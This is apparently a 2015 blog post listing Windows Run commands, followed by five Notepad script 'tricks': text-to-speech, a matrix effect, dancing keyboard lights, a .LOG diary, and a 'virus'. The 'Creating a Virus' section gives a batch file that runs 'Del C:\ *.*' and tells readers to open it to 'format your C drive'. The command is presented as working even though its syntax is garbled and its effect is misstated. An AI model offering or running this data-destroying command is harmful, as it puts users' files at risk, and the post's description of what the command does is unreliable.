Wednesday, January 28, 2015

Some Useful Run Commands For Windows


secpol.msc > Local Security Settings
control keyboard > Keyboard Properties
ipconfig/renew > Renew IP Configuration Settings
ipconfig/release > Cancels IP Configuration
ipconfig/flushdns > Removes the content of DNS cache
ipconfig/displaydns > Displays the DNS settings
ipconfig/all > Displays the IP configuration
inetcpl.cpl > Internet Properties
IExpress > IExpress .Cab file generator
mshearts > Hearts card game
Joy.cpl > Game Controllers
freecell > FreeCell card game
fonts > Windows fonts folder
control folders > Folder options
sigverif > Verification of signatures of file
Eventvwr.msc > Event Viewer
check > Mange the verification of drivers
drwtsn32 > Dr. Watson
control color > Display Appearance properties
control desktop > Display properties
diskpart > Partition manager
diskmgmt.msc > Disk Management
dfrg.msc > Disk Defragmenter
dxdiag > Display System Information
cleanmgr > Disk cleanup
directx.cpl > DirectX Control Panel
devmgmt.msc > Device Manager
ddeshare > DDE active sharing
compmgmt.msc > Computer Management
dcomcnfg > Service components
cmd > Command Prompt
chkdsk > Checking Disk
charmap > Character
certmgr.msc > Certificate Manager
calc > Calculator
fsquirt > Bluetooth file transfer
wuaucpl.cpl > Automatic Windows updates
control admintools > Administrative tools
appwiz.cpl > Add/Remove Programs
hdwwiz.cpl > Add Hardware
access.cpl > Accessibility Options
logoff > Log Off computer
winchat > Microsoft chat
control mouse > Properties of mouse
control NetConnect > Network Connections
netsetup.cpl > Network Configuration
packager > Manage links
OSK > On-Screen keyboard
perfmon.msc > Monitor performance
powercfg.cpl > Power Options
control printers > Printer and Fax properties
regedit > Registry Editor
mstsc > Remote Desktop Connection
ntmsmgr.msc > Removable Storage
sticpl.cpl > Scanners and Camera
control schedtasks > Scheduled Tasks
wscui.cpl > Security Center
shutdown > Turn off your computer
mmsys.cpl > Sounds and Audio Devices
sysedit > System Configuration Editor
msconfig > System Configuration Utility
taskmgr > Task Manager
nusrmgr.cpl > Users Accounts
sysdm.cpl > System Properties
write > Microsoft Wordpad
timedate.cpl > Date and Time Properties

So this was the list of the run commands hope you have liked it. Support us by sharing it over the web.

Some of the Notepad tricks

Notepad is the plain text editor which is very comfortable in creating basic text files. They are saved as .txt files which have no format of tags or styles and this type of notepad environment is used to write a source code in it in which suitable for editing system files to use in a DOS environment.

Notepad is not just a simple and plain text creating software it is a powerful one which we can use to create different types of hack commands, opening many extensions files and also creating own batch file programs. Here we are sharing top five notepad tricked which we summed up follow them carefully.

Creating a Virus
This is the most powerful and top tricks in the notepad which we can create a dangerous virus that will format your Windows C drive

Open the Notepad from your windows system
Paste the below code given
@Echo off
Del C:\ *.* |y
After pasting the code save the file as bat
Now to format your C drive just open this file.

Make your PC speak
This trick is too funny and easy to create which we just have to paste a code, by this we can make our system speak that what we are typing.So, follow the below steps

Open the Notepad from your windows system
Paste the below code given
Dim message, sapi
message=InputBox(“What do you want me to say?”,”ATT Text To Speak”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message
After pasting the code save the file as vbs
Now, open the saved file then a window opens which you have to type anything you want and press OK button then your system speaks.

Matrix Effect
Follow the below steps carefully to create a matrix like effects in your Notepad

Open the Notepad from your windows system
Paste the below code given
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
After pasting the code save the file as bat
Then open the saved to see the matrix effect.

 Make your Keyboard lights dance
This trick will make your keyboard’s three lights (Num Lock, Caps Lock, Scroll Lock) on and off randomly in which these will create a dancing light effect. Follow the below steps given below

Open the Notepad from your windows system
Paste the below code given
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

After pasting the code save the file as vbs
Then open your saved file which you can experience the amazing dancing light effect.

Create your Diary
This the most important trick and people having habit of writing Diary will love this. It creates your own diary in which if we write any information in it is saved automatically with date and time. Follow the below steps given below to create your diary

Open the Notepad from your windows system
Here no code is pasted just type .LOG in your Notepad
Save the file as txt
That’s it this is very easy to create now, open it and write anything it will be saved automatically with date and time.

And you are done. Please let us know if you face any issues through comments.